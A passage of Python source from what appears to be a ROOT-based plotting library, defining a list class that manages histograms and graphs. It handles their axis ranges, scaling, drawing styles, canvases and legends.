1.4, 1.4] self.axis_label_offset = [ 0.01, 0.01, 0.01] self.axis_title_size = [12 * scale, 12 * scale, 12 * scale] #[0.05, 0.05, 0.05] self.axis_label_size = [12 * scale, 12 * scale, 12 * scale] # for font 42 [0.04, 0.04, 0.04] def __getitem__(self, i): return self.l[i] def __len__(self): return len(self.l) def __str__(self): ret = [] ret.append('[i] dlist named: {} titled: {}'.format(self.name, self.title)) for i,item in enumerate(self.l): o = item.obj ret.append(' {} {} {} {}'.format(i, o.IsA().GetName(), o.GetName(), o.GetTitle())) return '\n'.join(ret) def copy_list(self, l=[]): for h in l: self.add(h) def copy(self, l): for h in l.l: self.add(h.obj, h.obj.GetTitle(), h.dopt.s) def last(self): if len(self.l) > 0: return self.l[-1] return None def last_index(self): return len(self.l)-1 def is_selected(self, o): if self.pattern != None: if not self.pattern in o.name: return False return True def _check_name(self, name): for o in self.l: if o.name == name: return True return False def get_by_name(self, name): for l in self.l: if l.name == name: return l return None def find_miny(self, low=None, logy=False): miny = 1e18 for h in self.l: if h.obj.InheritsFrom('TH1'): for nb in range(1, h.obj.GetNbinsX()): c = h.obj.GetBinContent(nb) if logy == False: if c!=0 and c <= miny: miny = c else: if c > 0 and c <= miny: miny = c if h.obj.InheritsFrom('TGraph'): for idx in range(h.obj.GetN()): v = h.obj.GetY()[idx] if logy == False: if v < miny: miny = v else: if v > 0 and v < miny: miny = v if low!=None: if miny < low: miny == low return miny def find_maxy(self, logy=False): maxy = -1e18 for h in self.l: if h.obj.InheritsFrom('TH1'): for nb in range(1, h.obj.GetNbinsX()): c = h.obj.GetBinContent(nb) if logy == False: if c!=0 and c > maxy: maxy = c else: if c > 0 and c > maxy: maxy = c if h.obj.InheritsFrom('TGraph'): vy = h.obj.GetY() for idx in range(h.obj.GetN()): v = vy[idx] if logy == False: if v > maxy: maxy = v else: if v > 0 and v > maxy: maxy = v return maxy def set_min_max_z(self, minz=None, maxz=None): for h in self.l: if h.obj.InheritsFrom('TH2') 
or h.obj.InheritsFrom('TF2'): if maxz: h.obj.SetMaximum(maxz) self.maxz = maxz if minz: h.obj.SetMinimum(minz) self.minz = minz else: self.debug('::adjust_maxima z : object not TH2 - no minz or maxz {} {}'.format(h.obj.GetName(), h.obj.GetTitle())) self.max_adjusted = True self.debug('::adjust_maxima z-min: {} z-max {}'.format(self.minz, self.maxz)) def adjust_maxima(self, miny=None, maxy=None, logy=False): if miny!=None: self.miny=miny else: self.miny = self.find_miny(logy=logy) if self.miny < 0: self.miny = self.miny * 1.1 else: self.miny = self.miny * 0.9 if logy==True: self.miny=self.find_miny(logy=logy) * 0.5 # self.miny, miny, maxy, logy if logy==True and self.miny <= 0: miny=self.find_miny(logy=logy) self.miny = miny if maxy!=None: self.maxy=maxy else: self.maxy=self.find_maxy() * 1.1 if logy==True: self.maxy=self.find_maxy() * 2. for h in self.l: if self.miny!=None: h.obj.SetMinimum(self.miny) if self.maxy!=None: h.obj.SetMaximum(self.maxy) self.max_adjusted = True self.debug('::adjust_maxima min: {} max {}'.format(self.miny, self.maxy)) def append(self, obj=ROOT.TObject, new_title = '', draw_opt = '', prep=False): newname_root = obj.GetName() + '_' + self.name.replace(' ', '_') newname = newname_root if ' name=' in new_title: splits = new_title.split(' name=') new_title = splits[0] newname = splits[1] newname = pyutils.to_file_name(newname) count = 1 while self._check_name(newname) == True: newname = newname_root + '_' + str(count) count = count + 1 if new_title == '': new_title = obj.GetTitle() if new_title[0] == '+': new_title = obj.GetTitle() + new_title[1:] o = draw_object(obj, newname, new_title, draw_opt) if prep == True: for oi in self.l: oi.is_first = False if len(self.l) == 0 or prep == True: o.is_first = True if prep == True: self.l.insert(0, o) else: self.l.append(o) self.debug('::append ' + o.name + ' ' + o.dopt.s + 'prepend:' + str(prep) ) return o def add_from_file(self, hname = '', fname = '', new_title = '', draw_opt = ''): fn, fext = os.path.splitext(hname) if fext == '.root': if os.path.isfile(hname) and not os.path.isfile(fname): print('[w] correcting possible swap between hname({}) and fname({}) args...'.format(hname, fname)) stmp = hname hname = fname fname = stmp cobj = None f = ROOT.TFile(fname) if f: h = f.Get(hname) if h: cobj = self.add(h, new_title, draw_opt) f.Close() else: f.Close() try: cobj = self.add_from_hashlist(hname, fname, new_title, draw_opt) except: pass if cobj: pass else: try: cobj = self.add_from_tfiledirectory(hname, fname, new_title, draw_opt) except: pass return cobj def add_from_hashlist(self, hname = '', fname = '', new_title = '', draw_opt = ''): cobj = None f = ROOT.TFile(fname) if f: splits = hname.split('/') #print splits[0], splits[1] hlist = f.Get(splits[0]) h = hlist.FindObject(splits[1]) if h: cobj = self.add(h, new_title, draw_opt) f.Close() return cobj def add_from_tfiledirectory(self, hname = '', fname = '', new_title = '', draw_opt = ''): cobj = None f = ROOT.TFile(fname) if f: splits = hname.split('/') #print splits[0], splits[1] hlist = f.Get(splits[0]) h = hlist.Get(splits[1]) print('[i] getting h',h,'from',splits[0],splits[1]) if h: cobj = self.add(h, new_title, draw_opt) f.Close() return cobj def add(self, obj=ROOT.TObject, new_title = '', draw_opt = '', prep=False): if obj == None: return None cobj = None try: robj = obj.obj except: robj = obj if 'smooth' in draw_opt: if robj.InheritsFrom('TH1') or robj.InheritsFrom('TF2'): _robj = robj.Clone('{}_smoothed'.format(robj.GetName())) _robj.Smooth() robj = _robj if 
robj.InheritsFrom('TH2') or robj.InheritsFrom('TF2'): xprof_new_title = new_title xprof_dopt="p e1 +k6 +m70 +p20" if '+xprof' in draw_opt or '+xprof' in new_title: if '+xprof[' in draw_opt: xprof_dopt = draw_opt.split('+xprof[')[1].split(']')[0] + ' over' draw_opt = draw_opt.replace('+xprof[{}]'.format(xprof_dopt), '') if '+xprof[' in new_title: xprof_new_title = new_title.split('+xprof[')[1].split(']')[0] new_title = new_title.replace('+xprof[{}]'.format(xprof_new_title), '') yprof_drop_zero_entries = False yprof_new_title = new_title yprof_dopt="p e1 +k6 +m70 +p25" if '+yprof' in draw_opt or '+yprof' in new_title: if '+yprof[' in draw_opt: yprof_dopt = draw_opt.split('+yprof[')[1].split(']')[0] + ' over' draw_opt = draw_opt.replace('+yprof[{}]'.format(yprof_dopt), '') yprof_drop_zero_entries = ('-0' in yprof_dopt) if yprof_drop_zero_entries: yprof_dopt = yprof_dopt.replace('-0', '') if '+yprof[' in new_title: yprof_new_title = new_title.split('+yprof[')[1].split(']')[0] new_title = new_title.replace('+yprof[{}]'.format(yprof_new_title), '') cobj = self.append(robj, new_title, draw_opt) if '+xprof' in draw_opt: hprofx = robj.ProfileX() cobj_px = self.append(hprofx, xprof_new_title, xprof_dopt) if '+yprof' in draw_opt: _hprofy = robj.ProfileY() hprofy = h_to_graph(_hprofy, drop_zero_entries=yprof_drop_zero_entries, xerror=True, transpose=True) cobj_py = self.append(hprofy, yprof_new_title, yprof_dopt) return cobj if robj.InheritsFrom("TH1") \ or robj.InheritsFrom("TGraph") \ or robj.InheritsFrom("TF1"): #h = ROOT.TH1(obj) if draw_opt == '': draw_opt = 'hist' if robj.InheritsFrom("TF1"): draw_opt = 'l' if 'ex0' in draw_opt.split(' '): draw_opt = draw_opt.replace('ex0', '') xerror = False else: xerror = True if robj.InheritsFrom('TH1') and 'graph' in draw_opt.split(' '): y_min = True y_min_test = draw_opt.split('ymin') if len(y_min_test) > 1: y_min_test = y_min_test[1].split(' ')[0] y_min = get_value(y_min_test, float, 0.0) robj = h_to_graph(robj, drop_zero_entries=y_min, xerror=xerror) if 'no_y_error' in draw_opt.split(' '): scale_graph_errors(robj, 1, 0.0) draw_opt = draw_opt.replace('no_y_error',' ') if 'no_x_error' in draw_opt.split(' '): scale_graph_errors(robj, 0, 0.0) draw_opt = draw_opt.replace('no_x_error',' ') draw_opt = draw_opt.replace('graph',' ') else: if xerror == False: if robj.InheritsFrom('TGraph'): scale_graph_errors(robj, 0, 0.0) cobj = self.append(robj, new_title, draw_opt, prep) if self.maxy < robj.GetMaximum(): self.maxy = robj.GetMaximum() if self.miny < robj.GetMinimum(): self.miny = robj.GetMinimum() return cobj def add_list(self, hl): for l in hl.l: self.add(l.obj, l.obj.GetTitle(), l.dopt.s) def reset_axis_titles(self, xt=None, yt=None, zt=None): for o in self.l: if xt: o.obj.GetXaxis().SetTitle(xt) if yt: o.obj.GetYaxis().SetTitle(yt) if zt: if o.obj.InheritsFrom('TH1'): o.obj.GetZaxis().SetTitle(zt) def fix_x_range(self, xmin, xmax): try: sxmin = '{0:.10f}'.format(xmin) xminf = get_value(sxmin, float, -1.0) except: xminf = -1. try: sxmax = '{0:.10f}'.format(xmax) xmaxf = get_value(sxmax, float, 1.0) except: xmaxf = 1. 
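        # What follows: fix_x_range() forces the drawn x-range by keeping a
        # hidden two-point TGraph named 'zoom_axis_obj' as the first object
        # in the list (it is drawn first, so it defines the axes). If one
        # already exists its points are moved; otherwise a new one is
        # inserted at index 0 with the 'noleg hidden p' options.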
reset = False for dobj in self.l: if 'zoom_axis_obj' in dobj.name: gr = dobj.obj gr.SetPoint(0, xminf, 0) gr.SetPoint(1, xmaxf, 0) if len(self.l) > 0: gr.GetXaxis().SetTitle(self.l[0].obj.GetYaxis().GetTitle()) gr.GetYaxis().SetTitle(self.l[0].obj.GetXaxis().GetTitle()) reset = True if reset == False: gr = ROOT.TGraph(2) gr.SetPoint(0, xminf, 0) gr.SetPoint(1, xmaxf, 0) if len(self.l) > 0: gr.GetXaxis().SetTitle(self.l[0].obj.GetXaxis().GetTitle()) gr.GetYaxis().SetTitle(self.l[0].obj.GetYaxis().GetTitle()) o = draw_object(gr, 'zoom_axis_obj', 'fake', 'noleg hidden p') self.l.insert(0, o) for oi in self.l: oi.is_first = False self.l[0].is_first = True def find_xlimits(self): xmin = 0 xmax = 0 for o in self.l: h = o.obj if not h.InheritsFrom('TH1'): if xmin > h.GetXaxis().GetXmin(): xmin = h.GetXaxis().GetXmin() if xmax > h.GetXaxis().GetXmax(): xmax = h.GetXaxis().GetXmax() continue for ix in range(1, h.GetNbinsX()+1): if h.GetBinContent(ix) != 0: if xmin > h.GetBinLowEdge(ix): xmin = h.GetBinLowEdge(ix) if xmax < h.GetBinCenter(ix) + h.GetBinWidth(ix): xmax = h.GetBinCenter(ix) + h.GetBinWidth(ix) return [xmin - xmin*0.1, xmax + xmax*0.1] def zoom_axis(self, which, xmin, xmax): try: sxmin = '{0:.10f}'.format(xmin) xminf = get_value(sxmin, float, 0.0) except: xminf = -1. try: sxmax = '{0:.10f}'.format(xmax) xmaxf = get_value(sxmax, float, 0.0) except: xmaxf = 1. ax = None for o in self.l: if which == 0: ax = o.obj.GetXaxis() #if xmax == None: # xlims = self.find_xlimits() # if xlims[0] != None: # self.zoom_axis(which, xlims[0], xlims[1]) if which == 1: ax = o.obj.GetYaxis() if which == 2: if o.obj.InheritsFrom('TH1'): ax = o.obj.GetZaxis() if ax: #print xmin,xmax ibmin = ax.FindBin(xminf) ibmax = ax.FindBin(xmaxf) #try: # #print 'ibmin, ibmax, nbins:',ibmin, ibmax, o.obj.GetNbinsX() # if ibmax > o.obj.GetNbinsX(): # ibmax = o.obj.GetNbinsX() # #print 'reset axis max to:',ibmax #except: # #print ibmin, ibmax # pass ##print xmin, xmax ax.SetRange(ibmin, ibmax) def scale_errors(self, val = 1.): for o in self.l: if o.obj.InheritsFrom('TH1') == False: continue for i in range(1, o.obj.GetNbinsX() + 1): err = o.obj.GetBinError(i) o.obj.SetBinError(i, err * val) def scale(self, val = 1.): for o in self.l: if o.obj.InheritsFrom('TH1') == False: continue if o.obj.GetSumw2() == None: o.obj.Sumw2() o.obj.Scale(val) #for i in range(1, o.GetNbinsX()): # err = o.GetBinError(i) # o.SetBinError(i, err * val) # v = o.GetBinContent(i) # o.SetBinContent(i, v * val) def scale_any(self, val = 1.): for o in self.l: if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() o.obj.Scale(val) if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] * val) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] * val) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] * val, o.obj.GetEYhigh()[i] * val) def scale_1ox_at_index(self, i=-1): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() #o.obj.Scale(val) print('[e] ::scale_1ox_at_index NOT implemented for histograms!') if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): if o.obj.GetX()[i] != 0: o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] / o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): if 
o.obj.GetX()[i] != 0: o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] / o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): if o.obj.GetX()[i] != 0: o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] / o.obj.GetX()[i], o.obj.GetEYhigh()[i] / o.obj.GetX()[i]) def scale_1ox_at_index_any(self): for i in range(len(self.l)): self.scale_1ox_at_index(i) def scale_1x_at_index(self, i=-1): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() #o.obj.Scale(val) print('[e] ::scale_1x_at_index NOT implemented for histograms!') if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] * o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] * o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] * o.obj.GetX()[i], o.obj.GetEYhigh()[i] * o.obj.GetX()[i]) def scale_1x_at_index_any(self): for i in range(len(self.l)): self.scale_1x_at_index(i) def scale_at_index(self, i=-1, val = 1.): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() if val == 0: o.obj.Scale(1.0, "width") else: o.obj.Scale(val) if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] * val) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] * val) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] * val, o.obj.GetEYhigh()[i] * val) def trim_graph_range(self, gr, xmin, xmax): n = gr.GetN() x = gr.GetX() if n < 1: return False if xmin == None: xmin = gr.GetX()[0] if xmax == None: xmin = gr.GetX()[n-1] for i in range(n): if (x[i] < xmin) or (x[i] > xmax): gr.RemovePoint(i) return self.trim_graph_range(gr, xmin, xmax) return False def trim_histogram_range(self, gr, xmin, xmax): ibmax = gr.GetNbinsX() + 1 if xmin == None: xmin = gr.GetBinLowEdge(1) if xmax == None: xmax = gr.GetBinCenter(ibmax) + gr.GetBinWidth(ibmax) for ibin in range(ibmax): xc = gr.GetBinCenter(ibin) if (xc < xmin) or (xc > xmax): gr.SetBinContent(ibin, 0.) gr.SetBinError(ibin, 0.) #gr.SetBinWeight(ibin, 0.) 
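        # Note on the trim_* helpers: trim_graph_range() removes points
        # outside [xmin, xmax] and recurses after each RemovePoint() because
        # removal shifts the remaining indices, while trim_histogram_range()
        # only zeroes the contents and errors of the out-of-range bins.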
return False def trim_at_index(self, i=-1, xlow=None, xhigh=None): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: self.trim_histogram_range(o.obj, xlow, xhigh) if o.obj.InheritsFrom('TGraph') == True: self.trim_graph_range(o.obj, xlow, xhigh) if o.obj.InheritsFrom('TF1') == True: o.obj.SetRange(xlow, xhigh) def flatten_at_index(self, i=-1, val=None): if len(self.l) < 1: return o = self.l[i] print('flatten', o.obj.GetName(), val) if o.obj.InheritsFrom('TH2') and val is not None: h = o.obj if not h.GetSumw2(): h.Sumw2() for ibx in range(1, h.GetXaxis().GetNbins() + 1): for iby in range(1, h.GetYaxis().GetNbins() + 1): if h.GetBinContent(ibx, iby) != 0 or h.GetBinError(ibx, iby) > 0: h.SetBinContent(ibx, iby, val) h.SetBinError(ibx, iby, 0.0) else: print('flatten implemented only for TH2') def rebin(self, val = 2, norm = False): for o in self.l: if o.obj.InheritsFrom('TH1') == False: continue if not o.obj.GetSumw2(): o.obj.Sumw2() o.obj.Rebin(val) if norm == True: o.obj.Scale(1./(val*1.)) def adjust_pad_margins(self, _left=0.17, _right=0.05, _top=0.1, _bottom=0.17+0.03): du.adjust_pad_margins(_left, _right, _top, _bottom) def adjust_axis_attributes(self, which, title_size=-1, label_size = -1, title_offset=-1): ax = None for o in self.l: if which == 0: ax = o.obj.GetXaxis() if which == 1: ax = o.obj.GetYaxis() if which == 2: if o.obj.InheritsFrom('TH1'): ax = o.obj.GetZaxis() if ax: if title_offset != -1: self.axis_title_offset[which] = title_offset if title_size != -1: self.axis_title_size[which] = title_size if label_size != -1: self.axis_label_size[which] = label_size ax.SetTitleFont (self.font) ax.SetTitleOffset(self.axis_title_offset[which]) ax.SetTitleSize (self.axis_title_size[which]) ax.SetLabelFont (self.font) ax.SetLabelSize (self.axis_label_size[which]) ax.SetLabelOffset(self.axis_label_offset[which]) def adjust_to_pad(self, pad): if pad == self.pad: #print '[i] nothing to adjust:',pad, self.pad return xfactor = pad.GetAbsWNDC() / self.pad.GetAbsWNDC() yfactor = pad.GetAbsHNDC() / self.pad.GetAbsHNDC() #print '::adjust_to_pad',xfactor, yfactor i = 0 new_size_t = self.axis_title_size[i] * yfactor new_size_l = self.axis_label_size[i] * yfactor new_size_to = self.axis_title_offset[i] * yfactor self.adjust_axis_attributes(i, new_size_t, new_size_l, new_size_to) i = 1 new_size_t = self.axis_title_size[i] * xfactor new_size_l = self.axis_label_size[i] * xfactor new_size_to = self.axis_title_offset[i] * xfactor self.adjust_axis_attributes(i, new_size_t, new_size_l, new_size_to) self.update() def _process_dopts(self, i): o = self.l[i] if o.dopt.hidden: kolor = 0 o.obj.SetFillColor(kolor) o.obj.SetFillColorAlpha(kolor, 0.0) o.obj.SetLineColor(kolor) o.obj.SetLineColorAlpha(kolor, 0.0) o.obj.SetMarkerColor(kolor) o.obj.SetMarkerColorAlpha(kolor, 0) o.obj.SetFillStyle(1001) o.obj.SetMarkerColor(kolor) o.obj.SetMarkerSize(-1) o.obj.SetMarkerStyle(-1) return #line if o.dopt.lstyle > 0: o.obj.SetLineStyle(o.dopt.lstyle) else: if o.dopt.use_line: kline = -1 if o.dopt.last_line: if i > 0: kline = self.l[i-1].obj.GetLineStyle() if kline < 0: kline = self.style.next_line() o.dopt.lstyle = kline o.obj.SetLineStyle(kline) #width if o.dopt.lwidth > 0: o.obj.SetLineWidth(o.dopt.lwidth) #marker if o.dopt.pstyle > 0: o.obj.SetMarkerStyle(o.dopt.pstyle) else: if o.dopt.use_marker: o.obj.SetMarkerStyle(self.style.next_marker()) mscale = 1. 
#if o.obj.GetMarkerStyle() >= 27 and o.obj.GetMarkerStyle() != 28: mscale = 1.4 if o.obj.GetMarkerStyle() >= 27: mscale = 1.4 o.obj.SetMarkerSize(o.dopt.psize * mscale) #fill if o.dopt.fstyle > 0: o.obj.SetFillStyle(o.dopt.fstyle) else: o.obj.SetFillStyle(0000) o.obj.SetFillColor(0) #kolor kolor = -1 if o.dopt.kolor > 0: kolor = o.dopt.kolor else: if o.dopt.last_kolor: if i > 0: kolor = self.l[i-1].dopt.kolor if kolor < 0: kolor = self.style.next_color() o.dopt.kolor = kolor o.obj.SetFillColor(kolor) o.obj.SetLineColor(kolor) o.obj.SetMarkerColor(kolor) alpha = 1.0 if o.dopt.alpha > 0: alpha = o.dopt.alpha/100. o.obj.SetFillColorAlpha(kolor, alpha) o.obj.SetLineColorAlpha(kolor, alpha) o.obj.SetMarkerColorAlpha(kolor, alpha) def _process_serror_dopts(self, i): o = self.l[i] #errx = ROOT.gStyle.GetErrorX() #ROOT.gStyle.SetErrorX(0.5) #ROOT.gStyle.SetErrorX(errx) o.obj.SetMarkerColor(0) o.obj.SetMarkerSize(-1) o.obj.SetMarkerStyle(0) #line if o.dopt.lstyle > 0: o.obj.SetLineStyle(o.dopt.lstyle) #width if o.dopt.lwidth > 0: o.obj.SetLineWidth(o.dopt.lwidth) #kolor kolor = -1 if o.dopt.kolor > 0: kolor = o.dopt.kolor else: if o.dopt.last_kolor: if i > 0: kolor = self.l[i-1].dopt.kolor if kolor < 0: kolor = 7 o.dopt.kolor = kolor alpha = 0.3 if o.dopt.alpha > 0: alpha = o.dopt.alpha/100. o.obj.SetFillColor(kolor) o.obj.SetLineColor(kolor) if o.dopt.rectangle == True: newalpha = alpha * 2. if newalpha > 1.0: newalpha = 1.0 o.obj.SetLineColorAlpha(kolor, newalpha) else: o.obj.SetLineColorAlpha(kolor, alpha) o.obj.SetMarkerColor(kolor) o.obj.SetMarkerColorAlpha(kolor, 0) if o.dopt.rectangle == True: o.obj.SetFillColorAlpha(kolor, alpha) o.obj.SetFillStyle(0000) else: o.obj.SetFillColorAlpha(kolor, alpha) o.obj.SetFillStyle(1001) def has2D(self): has2D = False for i,o in enumerate(self.l): if o.obj.IsA().InheritsFrom('TH2') == True: has2D = True if o.obj.IsA().InheritsFrom('TF2') == True: has2D = True return has2D def has_overlay(self): for o in self.l: if o.dopt.overlay: return True return False def draw(self, option='', miny=None, maxy=None, logy=False, colopt='', adjust_pad=True, adjust_axis_attributes=True): if self.has2D() == False: if miny == -1 and maxy == -1: pass else: self.adjust_maxima(miny=miny, maxy=maxy, logy=logy) if adjust_axis_attributes == True: self.adjust_axis_attributes(0) self.adjust_axis_attributes(1) self.adjust_axis_attributes(2) drawn = False #gdopt = draw_option(option) unused! 
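        # Outline of the drawing pass below: reset the style iterator; for
        # 2D content make (or split) a canvas; run any per-object 'exec'
        # hooks (dotted 'module.method' names resolved via importlib and
        # called with cobj/hl); apply pending +s x-shifts; let
        # _process_dopts() / _process_serror_dopts() translate each object's
        # draw_option into ROOT line/marker/fill/color settings; finally
        # draw 2D objects one per pad ('colz' by default) and 1D objects
        # into the same pad, appending 'same' after the first one.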
self.style.reset() if self.has2D(): #self.tcanvas = ROOT.gPad if not self.tcanvas: print('[i] 2D draw - making canvas here') if len(self.l) > 8: self.make_canvas(1000, 800) else: self.make_canvas() if self.has_overlay: self.tcanvas = du.make_canvas_grid(len(self.l), self.tcanvas) if self.tcanvas != None: tcname = self.tcanvas.GetName() else: tcname = 'used only in 2D case' for i,o in enumerate(self.l): for _exec in o.exec: # try: import importlib _mod_name, _meth_name = _exec.rsplit('.', 1) if _mod_name[:2] == './': sys.path.append(os.getcwd()) _mod_name = _mod_name[2:] print('[i] attempting to import', _mod_name) _module = importlib.import_module(_mod_name) print('[i] trying to get method', _meth_name, 'from', _module) _meth = getattr(_module, _meth_name) _meth(cobj=o, hl=self) #except: # print('[w] failed to exec',_meth_name, 'from', _mod_name, 'on', self.last_ds.hname, ' - command in', self.last_ds.fname) # pass for i,o in enumerate(self.l): if o.dopt.shift != 0: if o.obj.InheritsFrom('TGraph'): #print 'TGraph shifting...',o.dopt.shift tu.shift_graph(o.obj, o.dopt.shift) if o.obj.InheritsFrom('TH1'): #print 'TH1 shifting...',o.dopt.shift o.obj = tu.graph_from_h(o.obj, o.dopt.shift) o.dopt.shift = 0.0 self.debug('::draw ' + o.name + ' ' + o.dopt.stripped()) if o.dopt.is_error == False: self._process_dopts(i) #errors extra_opt = [] extra_opt.append(option) if o.dopt.is_error: extra_opt.append('E2') self._process_serror_dopts(i) if self.has2D(): if self.has_overlay: if o.obj.InheritsFrom('TH2') or o.obj.InheritsFrom('TF2'): # ROOT.gStyle.SetOptTitle(False) # True if len(o.dopt.stripped()) > 0: o.obj.Draw(o.dopt.stripped()) #print o.obj.GetName(),o.dopt.stripped() else: o.obj.Draw('colz') ROOT.gPad.SetToolTipText(o.obj.GetTitle(), 100) self.adjust_pad_margins(_right=0.17) else: o.draw('same '.join(extra_opt)) else: #tc = ROOT.gROOT.FindObject(tcname) #tc.cd(i+1) self.tcanvas.cd(i+1) ROOT.gStyle.SetOptTitle(False) # True if len(o.dopt.stripped()) > 0: o.obj.Draw(o.dopt.stripped()) #print o.obj.GetName(),o.dopt.stripped() else: o.obj.Draw('colz') ROOT.gPad.SetToolTipText(o.obj.GetTitle(), 100) self.adjust_pad_margins(_right=0.17) else: o.draw(' '.join(extra_opt)) if gDebug: dbgu.debug_obj(o.dopt) if adjust_pad == True and self.has2D() == False: self.adjust_pad_margins() self.update() self.pad_name = ROOT.gPad.GetName() # name is better self.pad = self.get_pad_drawn() if self.pad: self.debug('[i] ' + self.name + ' drawing on ' + str(self.pad)) def draw_bare(self, option=''): for i,o in enumerate(self.l): o.obj.Draw(option) def set_log_multipad(self, axes='', flag=True): l = self.tcanvas.GetListOfPrimitives() # print self.tcanvas.GetName(), len(l) # changed becaus of #logX 1 did not work? 
for i in range(len(l) + 1): tp = self.tcanvas.cd(i) if tp: if 'z' in axes: tp.SetLogz(flag) if 'y' in axes: tp.SetLogy(flag) if 'x' in axes: tp.SetLogx(flag) def set_grid_multipad(self, axes='', flag=True): l = self.tcanvas.GetListOfPrimitives() for i in range(len(l)): tp = self.tcanvas.cd(i+1) if tp: if 'y' in axes: tp.SetGridy(flag) if 'x' in axes: tp.SetGridx(flag) def get_pad_drawn(self): self.pad = ROOT.gROOT.FindObject(self.pad_name) if not self.pad: self.pad = None return self.pad def self_legend(self, ncols = 1, title='', x1=None, y1=None, x2=None, y2=None, tx_size=None, option='brNDC'): self.empty_legend(ncols, title, x1, y1, x2, y2, tx_size, option) if self.has2D() and self.force_legend is False: self.update() return self.legend for o in self.l: if not self.is_selected(o): continue if o.dopt.no_legend: continue #opt = o.dopt.stripped() opt = o.dopt.legend_option() self.debug('::self_legend legend entry with opt: {0} {1}'.format(opt,o.obj.GetTitle()) ) #self.legend.AddEntry(o.obj, o.obj.GetTitle(), opt) self.legend.AddEntry(o.obj, o.user_title, opt) self.legend.Draw() self.update() return self.legend def draw_legend(self, ncols = 1, title='', x1=None, y1=None, x2=None, y2=None, tx_size=None, option='brNDC'): print('[w] obsolete call to draw_legend use self_legend instead...') self.self_legend(ncols, title, x1, y1, x2, y2, tx_size, option) def empty_legend(self, ncols, title='', x1=None, y1=None, x2=None, y2=None, tx_size=None, option='brNDC'): if x1==None: x1 = 0.2 # 0.6 # was 0.3 # was 0.5 if y1==None: y1 = 0.67 #0.67 #0.7 #was 0.67 if x2==None: x2 = 0.92 # 0.8 #0.88 if y2==None: y2 = 0.87 #0.88 #used also 0.9 option = option + ' #l' self.legend = ROOT.TLegend(x1, y1, x2, y2, '', option) if len(title) > 0: self.legend.SetHeader(title) self.legend.SetNColumns(ncols) self.legend.SetBorderSize(0) fkolor = ROOT.kWhite if '+k' in option: try: fkolor = int(option.split('+k')[1].split(' ')[0]) except: fkolor = ROOT.kWhite self.legend.SetFillColor(fkolor) self.legend.SetFillStyle(1001) if '+a' in option: try: salpha = option.split('+a')[1].split(' ')[0] salpha = get_value(salpha, float, 100.)/100. 
except: salpha = 0 self.legend.SetFillColorAlpha(fkolor, salpha) else: if fkolor == ROOT.kWhite: self.legend.SetFillColorAlpha(fkolor, 0.66) else: self.legend.SetFillColorAlpha(fkolor, 0.10) self.legend.SetTextAlign(12) self.legend.SetTextFont(self.font) self.legend.SetTextColor(1) #if tx_size!=None: # if self.font == 42: # #tx_size=self.axis_title_size[0] # _tx_size = self.axis_title_size[0] * 0.8 * tx_size #0.045 # if self.font == 43: # _tx_size = 14 * tx_size # print tx_size,self.font # self.legend.SetTextSize(_tx_size) #else: # print self.axis_title_size[0] * 0.5 self.legend.SetTextSize(self.axis_title_size[0] * 0.5) # was 0.5 if tx_size!=None: self.legend.SetTextSize(tx_size) self.legend.SetToolTipText('#legend') return self.legend def update(self, logy=False): if self.pad: if logy: self.pad.SetLogy() self.pad.Modified() self.pad.Update() if self.tcanvas: l = self.tcanvas.GetListOfPrimitives() for i in range(len(l)): tp = self.tcanvas.cd(i+1) if tp: tp.Update() if logy: tp.SetLogy() self.tcanvas.Modified() self.tcanvas.Update() def make_canvas(self, w=600, h=400, split=0, orientation=0, name=None, title=None): #print 'make_canvas called' if self.tcanvas==None: if name == None: name = self.name + '-canvas' if title == None: title = self.name + '-canvas' name = pyutils.to_file_name(name) self.tcanvas = ROOT.TCanvas(name, title, w, h) print('[i] making canvas', self.tcanvas.GetName()) self.tcanvas.cd() if split > 0: du.split_gPad(split, orientation) tu.gList.append(self.tcanvas) return self.tcanvas def destroy_canvas(self): if self.tcanvas != None: self.tcanvas.Destructor() self.tcanvas = None def resize_window(self, w, h): self.tcanvas.SetWindowSize(w, h) # + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.SetWindowSize(w + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.Update() def 